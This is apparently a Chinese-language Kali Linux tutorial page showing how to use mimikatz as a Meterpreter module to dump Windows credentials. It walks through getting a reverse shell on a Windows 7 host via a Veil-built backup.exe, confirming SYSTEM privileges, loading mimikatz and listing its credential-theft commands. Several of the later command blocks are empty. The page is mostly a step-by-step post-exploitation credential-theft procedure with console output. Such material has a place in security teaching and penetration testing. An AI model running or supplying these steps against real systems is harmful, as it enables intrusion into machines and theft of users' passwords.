Kali-linux破解純文本密碼工具mimikatz

mimikatz是一款強大的系統密碼破解獲取工具。該工具有段時間是作爲一個獨立程序運行。現在已被添加到Metasploit框架中,並作爲一個可加載的Meterpreter模塊。當成功的獲取到一個遠程會話時,使用mimikatz工具可以很快的恢復密碼。本節將介紹使用mimikatz工具恢復密碼。

【實例8-3】演示使用mimikatz恢復純文本密碼。具體操作步驟如下所示。

(1)通過在目標主機(Windows 7)上運行Veil創建的可執行文件backup.exe,獲取一個遠程會話。如下所示:

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.6.103:4444
[*] Starting the payload handler…
[*] Sending stage (769536 bytes) to 192.168.6.110
[*] Meterpreter session 2 opened (192.168.6.103:4444 -> 192.168.6.110:1523) at 2014-07-19 16:54:18 +0800
meterpreter >

從輸出的信息中,可以看到獲取到了一個與192.168.6.110主機的遠程會話。

(2)確認目標用戶的權限。執行命令如下所示:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

從輸出信息中,可以看到當前用戶已經是系統權限。此時,就可以進行其他操作了。

(3)加載mimikatz模塊。執行命令如下所示:

meterpreter > load mimikatz
Loading extension mimikatz…success.

從輸出的信息中,可以看到mimikatz模塊已加載成功。

(4)查看mimikatz模塊下有效的命令。執行命令如下所示:

meterpreter > help

執行以上命令後,會輸出大量的信息。其中,在Meterpreter中所有的命令都已分類。這裏主要介紹下mimikatz相關的命令,如下所示:

Mimikatz Commands
=================
  Command    Description
  -------    -----------
  kerberos   Attempt to retrieve kerberos creds
  livessp    Attempt to retrieve livessp creds
  mimikatz_command  Run a custom commannd
  msv        Attempt to retrieve msv creds (hashes)
  ssp        Attempt to retrieve ssp creds
  tspkg      Attempt to retrieve tspkg creds
  wdigest    Attempt to retrieve wdigest creds

以上輸出信息顯示了可執行的Mimikatz命令。如回覆kerberos信息、livessp信息和哈希信息等。

【實例8-4】恢復哈希密碼。執行命令如下所示:

 

執行以上命令後,輸出五列信息。分別表示認證ID、包、域名、用戶名和密碼。從該界面可以看到,當前系統中bob用戶的哈希密碼值中。在哈希密碼值中,前面的lm表示使用LM方式加密;ntlm表示使用NTLM方式加密。

【實例8-5】獲取kerberos(網絡認證協議)信息。執行命令如下所示:

 

從輸出的信息中可以看到,輸出的信息類似msv命令輸出的信息。唯一不同的就是,這裏可以看到使用哈希加密的原始密碼。從以上信息中,可以看到bob用戶的密碼爲www.123。

【實例8-6】獲取wdigest(摘要式身份驗證)信息,如下所示:

 

以上輸出的信息就是當前用戶摘要式身份驗證的信息。

【實例8-7】恢復livessp身份驗證信息。執行命令如下所示:

 

以上輸出的信息顯示了當前用戶livessp身份驗證信息。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章